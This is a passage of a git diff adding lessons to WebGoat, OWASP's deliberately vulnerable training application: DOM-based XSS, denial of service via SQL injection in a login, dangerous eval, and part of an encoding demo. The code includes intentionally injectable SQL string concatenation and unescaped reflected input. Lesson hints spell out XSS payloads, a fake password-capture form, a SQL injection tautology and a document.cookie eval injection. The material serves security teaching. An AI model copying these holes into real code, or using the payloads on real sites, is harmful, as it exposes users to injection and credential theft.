+			ec.addElement(new Script().setSrc("javascript/DOMXSS.js"));
+
+			ec.addElement(new Script().setSrc("javascript/escape.js"));
+
+			ec.addElement(new H1().setID("greeting"));
+
+			ec.addElement(new StringElement("Enter your name: "));
+
+			attackString = new StringBuffer(s.getParser().getStringParameter(PERSON, ""));
+
+			Input input = new Input(Input.TEXT, PERSON, attackString.toString());
+			input.setOnKeyUp("displayGreeting(" + PERSON + ".value)");
+			ec.addElement(input);
+			ec.addElement(new BR());
+			ec.addElement(new BR());
+
+			Element b = ECSFactory.makeButton("Submit Solution");
+			ec.addElement(b);
+		} catch (Exception e) {
+			s.setMessage("Error generating " + this.getClass().getName());
+			e.printStackTrace();
+		}
+		return ec;
+
+	}
+
+	/**
+	 *  Gets the hints attribute of the HelloScreen object
+	 *
+	 * @return    The hints value
+	 */
+	public List<String> getHints(WebSession s) {
+		List<String> hints = new ArrayList<String>();
+
+		hints.add("Try entering the following: " + "&lt;IMG SRC=\"images/logos/owasp.jpg\"/&gt;");
+
+		hints.add("Try entering the following: " + "&lt;img src=x onerror=;;alert('XSS') /&gt;");
+
+		hints.add("Try entering the following: " + "&lt;IFRAME SRC=\"javascript:alert('XSS');\"&gt;&lt;/IFRAME&gt;");
+
+		hints.add("Try entering the following: " + "Please enter your password:&lt;BR&gt;&lt;input type = \"password\" name=\"pass\"/&gt;&lt;button " +
+				"onClick=\"javascript:alert('I have your password: ' + pass.value);\"&gt;Submit&lt;/button&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;");
+
+
+
+		//Attack Strings:
+
+		//<IMG SRC="images/logos/owasp.jpg"/>
+
+		//<img src=x onerror=;;alert('XSS') />
+
+		//<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
+
+		//Please enter your password:<BR><input type = "password" name="pass"/><button onClick="javascript:alert('I have your password: ' + pass.value);">Submit</button><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR>
+
+
+		return hints;
+	}
+
+	/**
+	 *  Gets the ranking attribute of the HelloScreen object
+	 *
+	 * @return    The ranking value
+	 */
+	private final static Integer DEFAULT_RANKING = new Integer(10);
+
+	protected Integer getDefaultRanking() {
+		return DEFAULT_RANKING;
+	}
+
+	protected Category getDefaultCategory() {
+		return Category.AJAX_SECURITY;
+	}
+
+	/**
+	 *  Gets the title attribute of the HelloScreen object
+	 *
+	 * @return    The title value
+	 */
+	public String getTitle() {
+		return ("LAB: DOM-Based cross-site scripting");
+	}
+
+	public String getInstructions(WebSession s) {
+		String instructions = "";
+
+		if (getLessonTracker(s).getStage() == 1) {
+			instructions = "STAGE 1:\tFor this exercise, your mission is to deface this website using the image at the following location: <a href = '/WebGoat/images/logos/owasp.jpg'>OWASP IMAGE</a>";
+		} else if (getLessonTracker(s).getStage() == 2) {
+			instructions = "STAGE 2:\tNow, try to create a JavaScript alert using the image tag";
+		} else if (getLessonTracker(s).getStage() == 3) {
+			instructions = "STAGE 3:\tNext, try to create a JavaScript alert using the IFRAME tag.";
+		} else if (getLessonTracker(s).getStage() == 4) {
+			instructions = "STAGE 4:\tUse the following to create a fake login form:<br><br>" + "Please enter your password:&lt;BR&gt;&lt;input type = \"password\" name=\"pass\"/&gt;&lt;button " +
+			"onClick=\"javascript:alert('I have your password: ' + pass.value);\"&gt;Submit&lt;/button&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;";
+		} else if(getLessonTracker(s).getStage() == 5) {
+			instructions = "STAGE 5:\tPerform client-side HTML entity encoding to mitigate the DOM XSS vulnerability. A utility method is provided for you in WebContent/javascript/escape.js.";
+		}
+		return (instructions);
+	}
+
+    private String getFileContent(String content)
+    {
+    	BufferedReader is = null;
+    	StringBuffer sb = new StringBuffer();
+
+    	try
+    	{
+    		is = new BufferedReader(new FileReader(new File(content)));
+    		String s = null;
+
+    		while((s = is.readLine()) != null)
+    		{
+    			sb.append(s);
+    		}
+    	}
+    	catch (Exception e)
+    	{
+    		e.printStackTrace();
+    	}
+    	finally
+    	{
+    		if(is != null)
+    		{
+    			try
+    			{
+    				is.close();
+    			}
+    			catch (IOException ioe)
+    			{
+
+    			}
+    		}
+    	}
+
+    	return sb.toString();
+    }
+
+    public Element getCredits()
+    {
+    	return super.getCustomCredits("", ASPECT_LOGO);
+    }
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/DOS_Login.java b/main/project/JavaSource/org/owasp/webgoat/lessons/DOS_Login.java
new file mode 100644
index 000000000..678b6ab1f
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/DOS_Login.java
@@ -0,0 +1,264 @@
+package org.owasp.webgoat.lessons;
+
+import java.sql.Connection;
+import java.sql.ResultSet;
+import java.sql.ResultSetMetaData;
+import java.sql.SQLException;
+import java.sql.Statement;
+import java.util.ArrayList;
+import java.util.List;
+
+import org.apache.ecs.Element;
+import org.apache.ecs.ElementContainer;
+import org.apache.ecs.StringElement;
+import org.apache.ecs.html.H1;
+import org.apache.ecs.html.H2;
+import org.apache.ecs.html.Input;
+import org.apache.ecs.html.P;
+import org.apache.ecs.html.TD;
+import org.apache.ecs.html.TR;
+import org.apache.ecs.html.Table;
+
+import org.owasp.webgoat.session.DatabaseUtilities;
+import org.owasp.webgoat.session.ECSFactory;
+import org.owasp.webgoat.session.WebSession;
+import org.owasp.webgoat.session.ParameterNotFoundException;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ *
+ * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
+ * @created October 28, 2003
+ */
+public class DOS_Login extends LessonAdapter
+{
+
+    /**
+     *  Description of the Field
+     */
+    protected final static String PASSWORD = "Password";
+
+    /**
+     *  Description of the Field
+     */
+    protected final static String USERNAME = "Username";
+
+    /**
+     *  Description of the Method
+     *
+     * @param  s  Description of the Parameter
+     * @return    Description of the Return Value
+     */
+    protected Element createContent(WebSession s)
+    {
+		ElementContainer ec = new ElementContainer();
+	
+		try
+		{
+		    String username = "";
+		    String password = "";
+		    username = s.getParser().getRawParameter(USERNAME);
+		    password = s.getParser().getRawParameter(PASSWORD);
+	
+		    // don;t allow user name from other lessons.  it would be too simple.
+		    if (username.equals("jeff") || username.equals("dave"))
+		    {
+				ec.addElement(new H2("Login Failed: 'jeff' and 'dave' are not valid for this lesson"));
+				return (ec.addElement(makeLogin(s)));
+		    }
+	
+		    // Check if the login is valid
+	    	Connection connection = DatabaseUtilities.getConnection(s);
+	
+		    String query = "SELECT * FROM user_system_data WHERE user_name = '"
+			    + username + "' and password = '" + password + "'";
+		    ec.addElement(new StringElement(query));
+		    
+		    try
+		    {
+				Statement statement = connection.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,ResultSet.CONCUR_READ_ONLY);
+				ResultSet results = statement.executeQuery(query);
+				
+				if ((results != null) && (results.first() == true))
+				{
+				    ResultSetMetaData resultsMetaData = results.getMetaData();
+				    ec.addElement(DatabaseUtilities.writeTable(results,resultsMetaData));
+				    results.last();
+		
+				    // If they get back more than one user they succeeded
+				    if (results.getRow() >= 1)
+				    {
+						// Make sure this isn't data from an sql injected query.
+						if (results.getString(2).equals(username) && results.getString(3).equals(password))
+						{
+						    String insertData1 = "INSERT INTO user_login VALUES ( '"
+							    + username
+							    + "', '"
+							    + s.getUserName()
+							    + "' )";
+						    statement.executeUpdate(insertData1);
+						}
+						// check the total count of logins
+						query = "SELECT * FROM user_login WHERE webgoat_user = '" + s.getUserName() + "'";
+						results = statement.executeQuery(query);
+						results.last();
+						// If they get back more than one user they succeeded
+						if (results.getRow() >= 3)
+						{
+						    makeSuccess(s);
+						    String deleteData1 = "DELETE from user_login WHERE webgoat_user = '" + s.getUserName() + "'";
+						    statement.executeUpdate(deleteData1);
+						    return (new H1("Congratulations! Lesson Completed"));
+						}
+			
+						ec.addElement(new H2("Login Succeeded: Total login count: " + results.getRow()));
+				    }
+				}
+				else
+				{
+				    ec.addElement(new H2("Login Failed"));
+				    // check the total count of logins
+				    query = "SELECT * FROM user_login WHERE webgoat_user = '"
+					    + s.getUserName() + "'";
+				    results = statement.executeQuery(query);
+				    results.last();
+				    ec.addElement(new H2("Successfull login count: "
+					    + results.getRow()));
+		
+				}
+		    }
+		    catch (SQLException sqle)
+		    {
+				ec.addElement(new P().addElement(sqle.getMessage()));
+				sqle.printStackTrace();
+		    }
+		}
+		catch (ParameterNotFoundException pnfe)
+		{
+			/**
+			 * Catching this exception prevents the "Error generating org.owasp.webgoat.lesson.DOS_Login"
+			 * message from being displayed on first load. Note that if we are missing a parameter in
+			 * the request, we do not want to continue processing and we simply want to display the
+			 * default login page.
+			 */
+		}
+		catch (Exception e)
+		{
+			s.setMessage("Error generating " + this.getClass().getName());
+		}
+	
+		return (ec.addElement(makeLogin(s)));
+    }
+
+
+    /**
+     *  Gets the category attribute of the WeakAuthenticationCookie object
+     *
+     * @return    The category value
+     */
+    protected Category getDefaultCategory()
+    {
+	return Category.DOS;
+    }
+
+
+    /**
+     *  Gets the hints attribute of the CookieScreen object
+     *
+     * @return    The hints value
+     */
+    protected List<String> getHints(WebSession s)
+    {
+	List<String> hints = new ArrayList<String>();
+	hints.add("Use a SQL Injection to obtain the user names. ");
+	hints
+		.add("Try to generate this query: SELECT * FROM user_system_data WHERE user_name = 'goober' and password = 'dont_care' or '1' = '1'");
+	hints
+		.add("Try &quot;dont_care' or '1' = '1&quot; in the password field");
+	return hints;
+    }
+
+    private final static Integer DEFAULT_RANKING = new Integer(90);
+
+
+    protected Integer getDefaultRanking()
+    {
+	return DEFAULT_RANKING;
+    }
+
+
+    /**
+     *  Gets the title attribute of the CookieScreen object
+     *
+     * @return    The title value
+     */
+    public String getTitle()
+    {
+	return ("Denial of Service from Multiple Logins");
+    }
+
+
+    /**
+     *  Description of the Method
+     *
+     * @param  s  Description of the Parameter
+     * @return    Description of the Return Value
+     */
+    protected Element makeLogin(WebSession s)
+    {
+	ElementContainer ec = new ElementContainer();
+
+	// add the login fields
+	Table t = new Table(0).setCellSpacing(0).setCellPadding(0).setBorder(0);
+
+	if (s.isColor())
+	{
+	    t.setBorder(1);
+	}
+
+	TR row1 = new TR();
+	TR row2 = new TR();
+	row1.addElement(new TD(new StringElement("User Name: ")));
+	row2.addElement(new TD(new StringElement("Password: ")));
+
+	Input input1 = new Input(Input.TEXT, USERNAME, "");
+	Input input2 = new Input(Input.PASSWORD, PASSWORD, "");
+	row1.addElement(new TD(input1));
+	row2.addElement(new TD(input2));
+	t.addElement(row1);
+	t.addElement(row2);
+
+	Element b = ECSFactory.makeButton("Login");
+	t.addElement(new TR(new TD(b)));
+	ec.addElement(t);
+
+	return (ec);
+    }
+
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/DangerousEval.java b/main/project/JavaSource/org/owasp/webgoat/lessons/DangerousEval.java
new file mode 100644
index 000000000..794171bee
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/DangerousEval.java
@@ -0,0 +1,280 @@
+package org.owasp.webgoat.lessons;
+
+import java.util.ArrayList;
+import java.util.List;
+import java.util.regex.Pattern;
+
+import org.apache.ecs.Element;
+import org.apache.ecs.ElementContainer;
+import org.apache.ecs.html.A;
+import org.apache.ecs.html.BR;
+import org.apache.ecs.html.Center;
+import org.apache.ecs.html.H1;
+import org.apache.ecs.html.HR;
+import org.apache.ecs.html.IMG;
+import org.apache.ecs.html.Input;
+import org.apache.ecs.html.TD;
+import org.apache.ecs.html.TH;
+import org.apache.ecs.html.TR;
+import org.apache.ecs.html.Table;
+import org.owasp.webgoat.session.WebSession;
+import org.owasp.webgoat.util.HtmlEncoder;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ *
+ * @author     Eric Sheridan, Aspect Security <a href="http://www.aspectsecurity.com"/>
+ * @created    October 28, 2003
+ */
+
+public class DangerousEval extends LessonAdapter
+{
+	public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com").addElement(new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0).setVspace(0));
+	
+	public final static String PASSED = "__DANGEROUS_EVAL_PASS";
+	
+    /**
+     *  Description of the Method
+     *
+     * @param  s  Description of the Parameter
+     * @return    Description of the Return Value
+     */
+
+    protected Element createContent(WebSession s)
+    {
+		ElementContainer ec = new ElementContainer();
+		String regex1 = "^[0-9]{3}$";// any three digits
+		Pattern pattern1 = Pattern.compile(regex1);
+	
+		try
+		{
+			checkSuccess(s);
+			
+			String param1 = s.getParser().getRawParameter("field1", "111");
+		    //String param2 = HtmlEncoder.encode(s.getParser().getRawParameter("field2", "4128 3214 0002 1999"));
+		    float quantity = 1.0f;
+		    float total = 0.0f;
+		    float runningTotal = 0.0f;
+	
+		    // FIXME: encode output of field2, then s.setMessage( field2 );
+		    ec.addElement("<script src=\"javascript/eval.js\"/>");
+		    ec.addElement(new HR().setWidth("90%"));
+		    ec.addElement(new Center().addElement(new H1().addElement("Shopping Cart ")));
+		    Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1).setWidth("90%").setAlign("center");
+	
+		    if (s.isColor())
+		    {
+		    	t.setBorder(1);
+		    }
+	
+		    TR tr = new TR();
+		    tr.addElement(new TH().addElement("Shopping Cart Items -- To Buy Now").setWidth("80%"));
+		    tr.addElement(new TH().addElement("Price").setWidth("10%"));
+		    tr.addElement(new TH().addElement("Quantity").setWidth("3%"));
+		    tr.addElement(new TH().addElement("Total").setWidth("7%"));
+		    t.addElement(tr);
+	
+		    tr = new TR();
+		    tr.addElement(new TD().addElement("Studio RTA - Laptop/Reading Cart with Tilting Surface - Cherry "));
+		    tr.addElement(new TD().addElement("69.99").setAlign("right"));
+		    tr.addElement(new TD().addElement(new Input(Input.TEXT, "QTY1", s.getParser().getStringParameter("QTY1", "1"))).setAlign("right"));
+		    quantity = s.getParser().getFloatParameter("QTY1", 0.0f);
+		    total = quantity * 69.99f;
+		    runningTotal += total;
+		    tr.addElement(new TD().addElement("$" + total));
+		    t.addElement(tr);
+		    tr = new TR();
+		    tr.addElement(new TD().addElement("Dynex - Traditional Notebook Case"));
+		    tr.addElement(new TD().addElement("27.99").setAlign("right"));
+		    tr.addElement(new TD().addElement(new Input(Input.TEXT, "QTY2", s.getParser().getStringParameter("QTY2", "1"))).setAlign("right"));
+		    quantity = s.getParser().getFloatParameter("QTY2", 0.0f);
+		    total = quantity * 27.99f;
+		    runningTotal += total;
+		    tr.addElement(new TD().addElement("$" + total));
+		    t.addElement(tr);
+		    tr = new TR();
+		    tr.addElement(new TD().addElement("Hewlett-Packard - Pavilion Notebook with Intel® Centrino™"));
+		    tr.addElement(new TD().addElement("1599.99").setAlign("right"));
+		    tr.addElement(new TD().addElement(new Input(Input.TEXT, "QTY3", s.getParser().getStringParameter("QTY3", "1"))).setAlign("right"));
+		    quantity = s.getParser().getFloatParameter("QTY3", 0.0f);
+		    total = quantity * 1599.99f;
+		    runningTotal += total;
+		    tr.addElement(new TD().addElement("$" + total));
+		    t.addElement(tr);
+		    tr = new TR();
+		    tr.addElement(new TD().addElement("3 - Year Performance Service Plan $1000 and Over "));
+		    tr.addElement(new TD().addElement("299.99").setAlign("right"));
+	
+		    tr.addElement(new TD().addElement(new Input(Input.TEXT, "QTY4", s.getParser().getStringParameter("QTY4", "1"))).setAlign("right"));
+		    quantity = s.getParser().getFloatParameter("QTY4", 0.0f);
+		    total = quantity * 299.99f;
+		    runningTotal += total;
+		    tr.addElement(new TD().addElement("$" + total));
+		    t.addElement(tr);
+	
+		    ec.addElement(t);
+	
+		    t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
+	
+		    if (s.isColor())
+		    {
+		    	t.setBorder(1);
+		    }
+	
+		    ec.addElement(new BR());
+	
+		    tr = new TR();
+		    tr.addElement(new TD().addElement("The total charged to your credit card:"));
+		    tr.addElement(new TD().addElement("$" + runningTotal));
+		    
+		    
+		    Input b = new Input();
+		    b.setType(Input.BUTTON);
+		    b.setValue("Update Cart");
+		    b.addAttribute("onclick", "purchase('lessons/Ajax/eval.jsp');");
+		    
+		    
+		    
+		    tr.addElement(new TD().addElement(b));
+		    t.addElement(tr);
+		    tr = new TR();
+		    tr.addElement(new TD().addElement("&nbsp;").setColSpan(2));
+		    t.addElement(tr);
+		    tr = new TR();
+		    tr.addElement(new TD().addElement("Enter your credit card number:"));
+		    tr.addElement(new TD().addElement("<input id='field2' name='field2' type='TEXT' value='4128 3214 0002 1999'>"));
+		    t.addElement(tr);
+		    tr = new TR();
+		    tr.addElement(new TD().addElement("Enter your three digit access code:"));
+		    tr.addElement(new TD().addElement("<input id='field1' name='field1' type='TEXT' value='123'>"));
+		    //tr.addElement(new TD().addElement(new Input(Input.TEXT, "field1",param1)));
+		    t.addElement(tr);
+	
+		    b = new Input();
+		    b.setType(Input.BUTTON);
+		    b.setValue("Purchase");
+		    b.addAttribute("onclick", "purchase('lessons/Ajax/eval.jsp');");
+		    
+		    tr = new TR();
+		    tr.addElement(new TD().addElement(b).setColSpan(2).setAlign("right"));
+		    t.addElement(tr);
+		    
+		    ec.addElement(t);
+		    ec.addElement(new BR());
+		    ec.addElement(new HR().setWidth("90%"));
+		}
+		catch (Exception e)
+		{
+		    s.setMessage("Error generating " + this.getClass().getName());
+		    e.printStackTrace();
+		}
+		return (ec);
+    }
+
+
+    /**
+     *  DOCUMENT ME!
+     *
+     * @return    DOCUMENT ME!
+     */
+    protected Category getDefaultCategory()
+    {
+    	return Category.AJAX_SECURITY;
+    }
+
+
+    /**
+     *  Gets the hints attribute of the AccessControlScreen object
+     *
+     * @return    The hints value
+     */
+    protected List<String> getHints(WebSession s)
+    {
+		List<String> hints = new ArrayList<String>();
+		hints.add("The lesson is similar to the standard reflected cross-site scripting lesson.");
+		hints.add("The access code parameter is vulnerable to a reflected cross-site scripting problem.");
+		hints.add("The usual &lt;SCRIPT&gt;alert(document.cookie);&lt;/SCRIPT&gt; will not work in this lesson. Why?");
+		hints.add("User-supplied data is landing in the Javascript eval() function. Your attack will not require the &lt; and &gt; characters.");
+		hints.add("In order to pass this lesson, you must 'alert' the document.cookie.");
+		hints.add("Try 123');alert(document.cookie);('");
+		return hints;
+    }
+
+
+    //	<script type="text/javascript">if ( navigator.appName.indexOf("Microsoft") !=-1) {var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open("TRACE", "./", false); xmlHttp.send();str1=xmlHttp.responseText;document.write(str1);}</script>
+    /**
+     *  Gets the instructions attribute of the WeakAccessControl object
+     *
+     * @return    The instructions value
+     */
+    public String getInstructions(WebSession s)
+    {
+		String instructions = "For this exercise, your mission is to come up with some input containing a script. You have to try to get this page to reflect that input back to your browser, which will execute the script. In order to pass this lesson, you must 'alert()' document.cookie.";
+		return (instructions);
+    }
+
+    private final static Integer DEFAULT_RANKING = new Integer(120);
+
+    protected Integer getDefaultRanking()
+    {
+    	return DEFAULT_RANKING;
+    }
+
+
+    /**
+     *  Gets the title attribute of the AccessControlScreen object
+     *
+     * @return    The title value
+     */
+    public String getTitle()
+    {
+    	return "Dangerous Use of Eval";
+    }
+    
+    public Element getCredits()
+    {
+    	return super.getCustomCredits("", ASPECT_LOGO);
+    }
+    
+    /**
+     * Check to see if JSP says they passed the lesson.
+     * @param s
+     */
+    private void checkSuccess(WebSession s)
+    {
+    	javax.servlet.http.HttpSession session = s.getRequest().getSession();
+		
+    	if(session.getAttribute(PASSED) != null)
+		{
+			makeSuccess(s);
+			
+			session.removeAttribute(PASSED);
+		}
+    }
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/Encoding.java b/main/project/JavaSource/org/owasp/webgoat/lessons/Encoding.java
new file mode 100644
index 000000000..8b9d98411
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/Encoding.java
@@ -0,0 +1,875 @@
+package org.owasp.webgoat.lessons;
+
+import java.io.IOException;
+import java.net.URLDecoder;
+import java.net.URLEncoder;
+import java.nio.ByteBuffer;
+import java.nio.CharBuffer;
+import java.nio.charset.Charset;
+import java.nio.charset.CharsetDecoder;
+import java.nio.charset.CharsetEncoder;
+import java.security.MessageDigest;
+import java.security.NoSuchAlgorithmException;
+import java.util.ArrayList;
+import java.util.List;
+
+import javax.crypto.Cipher;
+import javax.crypto.SecretKey;
+import javax.crypto.SecretKeyFactory;
+import javax.crypto.spec.PBEParameterSpec;
+
+import org.apache.ecs.Element;
+import org.apache.ecs.ElementContainer;
+import org.apache.ecs.html.A;
+import org.apache.ecs.html.B;
+import org.apache.ecs.html.IMG;
+import org.apache.ecs.html.Input;
+import org.apache.ecs.html.P;
+import org.apache.ecs.html.TD;
+import org.apache.ecs.html.TR;
+import org.apache.ecs.html.Table;
+import org.owasp.webgoat.session.ECSFactory;
+import org.owasp.webgoat.session.WebSession;
+import org.owasp.webgoat.util.HtmlEncoder;
+
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ *
+ * @author     Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
+ * @created    October 28, 2003
+ */
+
+public class Encoding extends LessonAdapter
+{
+	public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com").addElement(new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0).setVspace(0));
+	
+	private final static String INPUT = "input";
+
+	private final static String KEY = "key";
+
+	// local encoders
+
+	private static sun.misc.BASE64Decoder decoder = new sun.misc.BASE64Decoder();
+
+	private static sun.misc.BASE64Encoder encoder = new sun.misc.BASE64Encoder();
+
+	// encryption constant
+
+	private static byte[] salt =
+			{
+			(byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00,
+			(byte) 0x00
+			};
+
+
+
+	/**
+	 *  Returns the base 64 decoding of a string.
+	 *
+	 * @param  str              Description of the Parameter
+	 * @return                  Description of the Return Value
+	 * @exception  IOException  Description of the Exception
+	 */
+
+	public static String base64Decode( String str ) throws IOException
+	{
+
+		byte[] b = decoder.decodeBuffer( str );
+
+		return ( new String( b ) );
+	}
+
+
+
+	/**
+	 *  Description of the Method
+	 *
+	 * @param  c                Description of the Parameter
+	 * @return                  Description of the Return Value
+	 * @exception  IOException  Description of the Exception
+	 */
+
+	public static String base64Decode( char[] c ) throws IOException
+	{
+
+		return base64Decode( new String( c ) );
+	}
+
+
+
+	/**
+	 *  Description of the Method
+	 *
+	 * @param  c  Description of the Parameter
+	 * @return    Description of the Return Value
+	 */
+
+	public static String base64Encode( char[] c )
+	{
+
+		return base64Encode( new String( c ) );
+	}
+
+
+
+	/**
+	 *  Returns the base 64 encoding of a string.
+	 *
+	 * @param  str  Description of the Parameter
+	 * @return      Description of the Return Value
+	 */
+
+	public static String base64Encode( String str )
+	{
+
+		byte[] b = str.getBytes();
+
+		return ( encoder.encode( b ) );
+	}
+
+
+
+	/**
+	 *  Description of the Method
+	 *
+	 * @param  b  Description of the Parameter
+	 * @return    Description of the Return Value
+	 */
+
+	public static String base64Encode( byte[] b )
+	{
+
+		return ( encoder.encode( b ) );
+	}
+
+
+
+	/**
+	 *  Description of the Method
+	 *
+	 * @param  s  Description of the Parameter
+	 * @return    Description of the Return Value
+	 */
+
+	protected Element createContent( WebSession s )
+	{
+
+		ElementContainer ec = new ElementContainer();
+
+		try
+		{
+
+			String userInput = s.getParser().getRawParameter( INPUT, "" );
+
+			String userKey = s.getParser().getStringParameter( KEY, "" );
+
+			Table table = new Table();
+
+			TR tr = new TR();
+
+			tr.addElement( new TD( "Enter a string: " ) );
+
+			Input input = new Input( Input.TEXT, INPUT, userInput );
+
+			tr.addElement( new TD().addElement( input ) );
+
+			table.addElement( tr );
+
+			tr = new TR();
+
+			tr.addElement( new TD( "Enter a password (optional): " ) );
+
+			Input key = new Input( Input.TEXT, KEY, userKey );
+
+			tr.addElement( new TD().addElement( key ) );
+
+			table.addElement( tr );
+
+			tr = new TR();
+
+			Element b = ECSFactory.makeButton( "Go!" );
+
+			tr.addElement( new TD().setAlign( "center" ).setColSpan( 2 ).addElement( b ) );
+
+			table.addElement( tr );
+
+			ec.addElement( table );
+
+			ec.addElement( new P() );
+
+			Table t = new Table();
+
+			t.setWidth( "100%" );
+
+			t.setBorder( 0 );
+
+			t.setCellSpacing( 1 );
+
+			t.setCellPadding( 4 );
+
+			String description;
+
+			t.addElement( makeTitleRow( "Description", "Encoded", "Decoded" ) );
+
+			description = "Base64 encoding is a simple reversable encoding used to encode bytes into ASCII characters. Useful for making bytes into a printable string, but provides no security.";
+
+//			t.addElement( makeDescriptionRow( description ) );
+			t.addElement( makeRow( description, base64Encode( userInput ), base64Decode( userInput ) ) );
+//			t.addElement( makeSpacerRow() );
+
+			description = "Entity encoding uses special sequences like &amp;amp; for special characters. This prevents these characters from being interpreted by most interpreters.";
+
+			t.addElement( makeRow( description, HtmlEncoder.encode( userInput ), HtmlEncoder.decode( userInput ) ) );
+
+			description = "Password based encryption (PBE) is strong encryption with a text password. Cannot be decrypted without the password";
+
+			t.addElement( makeRow( description, encryptString( userInput, userKey ), decryptString( userInput, userKey ) ) );
+			description = "MD5 hash is a checksum that can be used to validate a string or byte array, but cannot be reversed to find the original string or bytes. For obscure cryptographic reasons, it is better to use SHA-256 if you have a choice.";
+
+			t.addElement( makeRow( description, hashMD5( userInput ), "Cannot reverse a hash" ) );
+			
+			description = "SHA-256 hash is a checksum that can be used to validate a string or byte array, but cannot be reversed to find the original string or bytes.";
+
+			t.addElement( makeRow( description, hashSHA( userInput ), "N/A" ) );
+			
+			description = "Unicode encoding is...";
+
+			t.addElement( makeRow( description, "Not Implemented", "Not Implemented" ) );
+			
+			description = "URL encoding is...";
+
+			t.addElement( makeRow( description, urlEncode( userInput ), urlDecode( userInput ) ) );
+			
+			description = "Hex encoding simply encodes bytes into %xx format.";
+
+			t.addElement( makeRow( description, hexEncode( userInput ), hexDecode( userInput ) ) );
+			
+			description = "Rot13 encoding is a way to make text unreadable, but is easily reversed and provides no security.";
+
+			t.addElement( makeRow( description, rot13( userInput ), rot13( userInput ) ) );
+			
+			description = "XOR with password encoding is a weak encryption scheme that mixes a password into data.";
+
+			t.addElement( makeRow( description, xorEncode( userInput, userKey ), xorDecode( userInput, userKey ) ) );
+			
+			description = "Double unicode encoding is...";
+
+			t.addElement( makeRow( description, "Not Implemented", "Not Implemented" ) );
+			
+			description = "Double URL encoding is...";
+
+			t.addElement( makeRow( description, urlEncode( urlEncode( userInput ) ), urlDecode( urlDecode( userInput ) ) ) );
+			
+			ec.addElement( t );
+
+		}
+
+		catch ( Exception e )
+		{
+
